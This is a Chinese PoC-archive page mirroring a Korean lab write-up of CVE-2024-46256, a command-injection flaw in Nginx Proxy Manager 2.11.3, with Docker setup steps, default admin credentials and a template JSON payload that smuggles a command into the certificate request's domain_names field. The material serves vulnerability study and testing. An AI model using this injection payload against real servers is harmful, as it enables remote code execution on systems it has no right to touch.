目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1336

100%

CVE-2024-46256 PoC — NginxProxyManager 安全漏洞

来源
关联漏洞
标题: NginxProxyManager 安全漏洞 (CVE-2024-46256)
Description:NginxProxyManager是NginxProxyManager个人开发者的用于管理 Nginx 代理主机的 Docker 容器,具有简单、强大的界面。 NginxProxyManager 2.11.3版本存在安全漏洞,该漏洞源于存在命令注入漏洞,允许攻击者通过Add Lets Encrypt证书进行远程代码执行。
Description
CVE-2024-46256 tool
介绍
# CVE-2024-46256 Nginx Proxy Manager RCE 취약점 분석



## 환경 구축

### 1. Nginx Proxy Manager 2.11.3 환경 실행

```bash

docker-compose up -d

```

또는 자동 스크립트를 사용할 수 있습니다:

```bash

python setup_environment.py

```

### 2. Nginx Proxy Manager 접속

- URL: http://localhost:81

- 초기 설정을 완료한 후 테스트 진행

- 기본 관리자 계정으로 로그인 (이메일: admin@example.com / 비밀번호: changeme)

- 인증서 발급 관련 기능 접근 권한 확인

## 취약점 정보

- **CVE ID**: CVE-2024-46256

- **제품**: Nginx Proxy Manager

- **버전**: 2.11.3

- **취약점 유형**: Remote Code Execution (RCE)

- **CVSS**: High

## PoC 코드

PoC는 인증된 사용자가 인증서 발급(예: Let's Encrypt) 요청 과정에서 도메인 이름 필드에 템플릿/명령 주입을 수행하여 RCE를 유발합니다.

예시 페이로드(개념 예시):

```json
{
  "domain_names": ["test.com\"||{command}||\\n test.com\""],
  "meta": {
    "dns_challenge": false,
    "letsencrypt_agree": true,
    "letsencrypt_email": "admin@example.com"
  },
  "provider": "letsencrypt"
}
```

## 분석 환경

- OS: Windows 10

- Docker: 최신 버전

- Nginx Proxy Manager: 2.11.3


文件快照

登录后查看神龙缓存的 POC 文件快照

登录查看
备注
    1. 建议优先通过来源进行访问。
    2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
    3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →